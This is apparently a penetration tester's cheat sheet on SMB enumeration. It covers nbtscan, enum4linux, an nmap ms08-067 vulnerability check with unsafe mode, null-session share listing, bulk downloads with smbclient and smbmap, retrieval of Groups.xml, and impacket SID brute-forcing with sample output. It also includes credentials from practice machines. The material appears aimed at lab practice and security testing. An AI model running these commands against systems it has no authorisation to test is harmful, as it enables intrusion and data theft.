SMB

TCP ports 139, 445

139,445 - Pentesting SMBHackTricks

Please note that you have about 10 seconds after you issue the “dir” command to run the “Get- SmbConnection” cmdlet. The SMB client will tear down the connections if there is no activity between the client and the server. It might help to know that you can use the alias “gsmbc” instead of the full cmdlet name.

nbtscan

nbtscan — program for scanning networks for NetBIOS name information

e.g.

nbtscan -r 10.11.1.0/24

enum4linux (a bit out of date - consider using smbmap instead)

• a useful tool for extracting information from an SMB null session

• Useful for both Windows and Samba systems

• the -a flag specifies all simple enumeration

e.g.

enum4linux -a 10.11.1.227

This means that null sessions are allowed..

Nmap Scripts

• make use of OS discovery and the various SMB enumeration scripts in particular

• to chcek for know SMB protocol vulnerabilities, you can invoke one of the nmap smb-vuln scripts

e.g.

nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.201

View Shares

smbclient -L //<hostname>

smbclient -L //<hostname> -U%

Connect to Shares

smbclient //<hostname>/<share> -U<username>%<password>

Download everything

smb: \> recurse ON

smb: \> prompt OFF

smb: \> mget *

smbclient -U user2020 '//10.10.10.50/sharename' -c 'prompt OFF;recurse ON;mget *'

smbmap -H <ip address>

• lists file shares and permissions

• there are also many other uses for the tool

• • see the help page for more info

smbmap -R <share name> -H <ip address>

• recursively list all files in folders in a share located on a specific system

smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q

• download a file from the share

*** It does not download the file to the current directory

• it's easiest to identify where it is stored by using find or locate

• e.g. updatedb; locate Groups.xml

• e.g. find / -name *Groups.xml 2>/dev/null

smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100

Metasploit

auxiliary/scanner/smb/smb_version

• enumerate smb version

If smbclient is giving you error:

Add the following line under "global" in /etc/samba/smb.conf:

client min protocol = NT1

Enumerate SMB users

python3 /opt/impacket/examples/lookupsid.py <username>:<password>@<ip address or hostname>

root@kali:/opt/impacket/examples# python3 lookupsid.py hazard:stealth1agent@10.10.10.149

Impacket v0.9.22.dev1+20201112.141202.d1ced941 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149

[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]

[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112

500: SUPPORTDESK\Administrator (SidTypeUser)

501: SUPPORTDESK\Guest (SidTypeUser)

503: SUPPORTDESK\DefaultAccount (SidTypeUser)

504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)

513: SUPPORTDESK\None (SidTypeGroup)

1008: SUPPORTDESK\Hazard (SidTypeUser)

1009: SUPPORTDESK\support (SidTypeUser)

1012: SUPPORTDESK\Chase (SidTypeUser)

1013: SUPPORTDESK\Jason (SidTypeUser)